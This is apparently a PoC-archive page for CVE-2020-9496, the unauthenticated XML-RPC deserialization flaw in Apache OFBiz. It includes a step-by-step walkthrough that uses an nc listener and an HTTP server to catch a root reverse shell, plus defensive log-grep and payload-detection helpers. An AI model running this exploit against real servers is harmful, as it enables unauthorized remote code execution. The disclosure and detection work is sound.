Related vulnerability
Title: Apache OFBiz code-quality vulnerability (CVE-2020-9496)
Description: Apache OFBiz is an enterprise resource planning (ERP) system from the Apache Software Foundation (US). It provides a full suite of Java-based web application components and tools. Apache OFBiz 17.12.03 contains a code-quality vulnerability caused by the web application's failure to properly validate client-supplied data. An attacker can exploit it to execute arbitrary code.
Introduction
# CVE-2020-9496
Because the two XML-RPC related requests in webtools (`xmlrpc` and `ping`) do not require authentication, they are vulnerable to unsafe deserialization by an unauthenticated attacker.
This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.
# Affected Version: 17.12.01 (the version tested here; the vulnerability entry above lists 17.12.03, so treat every 17.12.x release before the 17.12.04 fix as affected)
# Fixed Versions: 18.12.01, 17.12.04
Original blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's issue: https://issues.apache.org/jira/browse/OFBIZ-11716
GitHub PoC: https://github.com/g33xter/CVE-2020-9496
To make this exploit work, follow these steps:
### Step 1: Host an HTTP service with python3 (the target must be able to reach this port)
```
> sudo python3 -m http.server 80
```
### Step 2: Run an nc listener on the desired port (8001 recommended); this is the PORT you pass to the script in Step 4
```
> nc -nlvp 8001
```
### Step 3: Change the target's URL and port inside the script:
```
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
```
### Step 4: Run the exploit as shown below, where IP and PORT are the address and port of your nc listener from Step 2
```
> ./cve-2020-9496.sh -i IP -p PORT
```
### Step 5: Check the nc listener. The shell runs as whatever user OFBiz runs as; in this PoC container that is root
```
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01#
```
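The following is an added example, not part of the g33xter PoC or of OFBiz itself: shell helpers for the two practical checks around the steps above, confirming that the `xmlrpc` request answers without credentials before firing the exploit, and finding attempts against these two endpoints in web-server logs afterwards. It assumes a combined-format access log, the default `/webtools/control/` request prefix, and that `ping` is a valid method name for the benign probe; the `<serializable>` element it looks for is Apache XML-RPC's extension type for a base64-encoded Java object. The sample log lines and request bodies are constructed.

```shell
#!/usr/bin/env bash
# Added example, not part of the g33xter PoC: triage helpers for the
# unauthenticated /webtools xmlrpc and ping requests described above.
# Everything here runs offline on constructed data except probe_endpoint.
set -u

# The two request paths named in the README. The "control/" segment is the
# usual OFBiz controller mount; adjust it if your deployment remaps it (assumption).
OFBIZ_XMLRPC_PATHS='/webtools/control/(xmlrpc|ping)'

# Print access-log lines whose request line is a POST to either endpoint.
# Combined/common log format on stdin is assumed. Neither request needs a
# session, so every hit from an untrusted network is worth a look.
flag_xmlrpc_posts() {
    grep -E "\"POST ${OFBIZ_XMLRPC_PATHS}[^ ]* HTTP/" || true
}

# Same filter, but print only the number of matching lines (0 when none).
count_xmlrpc_posts() {
    grep -cE "\"POST ${OFBIZ_XMLRPC_PATHS}[^ ]* HTTP/" || true
}

# Return 0 when an XML-RPC request body carries a <serializable> value.
# That element is Apache XML-RPC's extension type for a base64-encoded Java
# object, i.e. the data the handler deserializes. Ordinary OFBiz clients send
# plain XML-RPC scalars and structs, so its presence in an unauthenticated
# request is a strong indicator of an exploitation attempt.
body_has_serializable() {
    printf '%s' "$1" | grep -qiE '<(ex:)?serializable[[:space:]>]'
}

# Confirm the endpoint answers without credentials before running the exploit.
# Sends a benign methodCall (the "ping" method name is an assumption) and prints
# the body followed by the HTTP status. A 200 with a methodResponse (even a
# fault) means the handler processed the unauthenticated call; a redirect to
# the login page means it did not. Usage: probe_endpoint https://127.0.0.1:8443
# (assumed target URL). Not run by the offline demo below.
probe_endpoint() {
    curl -sk -w '\nHTTP %{http_code}\n' -X POST \
        -H 'Content-Type: text/xml' \
        --data '<?xml version="1.0"?><methodCall><methodName>ping</methodName><params/></methodCall>' \
        "$1/webtools/control/xmlrpc"
}

# Constructed sample data (not captured from a real system).
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /webtools/control/main HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 200 77
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /webtools/control/ping HTTP/1.1" 200 77
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "POST /webtools/control/login HTTP/1.1" 302 0'

SAMPLE_BENIGN_BODY='<?xml version="1.0"?><methodCall><methodName>ping</methodName><params/></methodCall>'
# The base64 below is a placeholder standing in for a serialized Java object.
SAMPLE_DESER_BODY='<?xml version="1.0"?><methodCall><methodName>example</methodName><params><param><value><struct><member><name>x</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyAA==</serializable></value></member></struct></value></param></params></methodCall>'

# Offline demo: list the flagged requests and classify the two bodies.
printf '%s\n' "$SAMPLE_LOG" | flag_xmlrpc_posts
for body in "$SAMPLE_BENIGN_BODY" "$SAMPLE_DESER_BODY"; do
    if body_has_serializable "$body"; then
        echo "serializable payload: YES"
    else
        echo "serializable payload: no"
    fi
done
```

Run the file as-is for the offline demo; call `probe_endpoint` only against a system you are authorized to test. On the defensive side, the same two request paths are the ones to block at the reverse proxy until the 17.12.04 upgrade is in place, and `body_has_serializable` is the check to run over any captured request bodies from the time window flagged by `flag_xmlrpc_posts`.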
File snapshot
[4.0K] /data/pocs/e78aec149b48df303dc749dcfb86cd588eecff2a
├── [3.0K] cve-2020-9496.sh
└── [1.4K] README.md
0 directories, 2 files
Notes
1. Prefer accessing the PoC through its original source.
2. If the source has gone offline or is unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for or donating towards the local PoC. Thank you for your support.